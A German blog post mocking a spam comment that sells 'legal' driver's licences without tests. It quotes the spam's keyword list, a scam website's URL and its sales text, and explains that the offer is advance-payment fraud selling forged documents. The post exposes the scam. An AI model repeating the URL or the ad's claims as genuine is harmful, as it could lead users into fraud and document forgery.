Also macht das! Man kann nämlich mit seinem Geld und seiner beschränkten Lebenszeit etwas Besseres anfangen. 😉

¹Man kann jede beliebige Absenderadresse in eine E-Mail eintragen, ganz ähnlich, wie man auch jeden Absender auf einen Briefumschlag schreiben kann. Für den Transport der E-Mail spielt der Absender keine Rolle.

führerschein klasse b kaufen

Freitag, 15. Mai 2020

So nannte sich der Intelligenzflüchtling mit seiner IP-Adresse aus Nigeria, der heute um 12:45 Uhr den folgenden „Kommentar“ hier auf Unser täglich Spam veröffentlichen wollte, aber leider sein Spamskript so schlecht programmiert hat, dass es auch für Menschen unsichtbare Felder in einem Formular ausfüllt, so dass die Spamerkennung trivial war.

echten führerschein kaufen
führerschein klasse b kaufen
führerschein legal kaufen
führerschein ohne fahrschule
registrierten Führerschein kaufen
führerschein kaufen erfahrungen
führerschein aussteller
führerschein online test
eu führerschein
führerschein klasse b
führerschein ohne mpu

führerschein kaufen ohne prüfungführerschein klasse b kaufen

Führerschein kaufen
Eu-Führerschein Kaufen

führerschein klasse b kaufen
ohne prüfung

Führerschein Ohne MPU
kaufen

kaufe gelöschte mpu
EU-Führerschein legal kaufenführerschein ohne prüfung

http://xn--registriertrefhrerschein-8sc.com/

So so, Führerschein kaufen, ohne Test oder Fahrschule, aber „legal“. Endlich weiß ich, wo diese ganzen „Verkehrsteilnehmer“ herkommen, die ich nicht vermisste, wenn es sie nicht gäbe. Wie „legal“ die Verwendung einer gefälschten Urkunde der BRD ist, erklärt übrigens bei Bedarf gern das Strafgesetzbuch. Kurz: Die Vorstrafe dürfte sicher sein. Wer einen Richter findet, der einem die Geschichte „aber ich war im Tatbestandsirrtum, denn ich habe geglaubt, dass das legal ist, weil es in einem Spamkommentar im Internet steht“ abkauft, sage bitte Bescheid, damit wir alle etwas zum Lachen haben. 😀

Aber die freundlichen Nigerianer wollen ja auch keine Führerscheine ausgeben, sondern leichtgläubigen Menschen das Geld aus der Tasche ziehen. Leider haben sie kein Bankkonto, so dass man nur anonymisierend über Western Union und Konsorten bezahlen kann. Der „Führerschein“ kommt nicht oder ist eine dermaßen „tolle“ Fälschung, dass man nur beim Hinschauen sieht, dass er gefälscht ist. Das Geld ist weg. 💸

Ach ja, diesmal gibt es keine GMail-Mailadresse für die Bestellung – es hat sich offenbar sogar in Nigeria herumgesprochen, dass das so unseriös wirkt, dass niemand mehr darauf reinfällt – sondern eine Website. Und die sieht auch aus, und zwar so:

Screenshot der betrügerischen Website

Ich zitiere aus der Website „Registriertre Führerschein“:

Wir sind seit 8 Jahren die besten Produzenten von echten Dokumenten im Deutschen. Dank unserer jahrelangen Erfahrung verfügen wir über Fachwissen in diesem Bereich, und unser superqualifiziertes Team steht Ihnen mit Rat und Tat zur Seite. Kontakt uns jetzt, ein Dokument bei uns zu bestellen.

echten führerschein kaufen, führerschein klasse b kaufen, führerschein legal kaufen, führerschein ohne fahrschule, registrierten Führerschein kaufen, führerschein kaufen erfahrungen

Die Mugus… ähm… besten Produzenten von „echten Dokumenten im Deutschen“, die übrigens ganz nebenbei auch noch das Löschen von Strafregistereinträgen als Dienstleistung anbieten, können leider noch kein Deutsch. Wie schade! 🤡

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.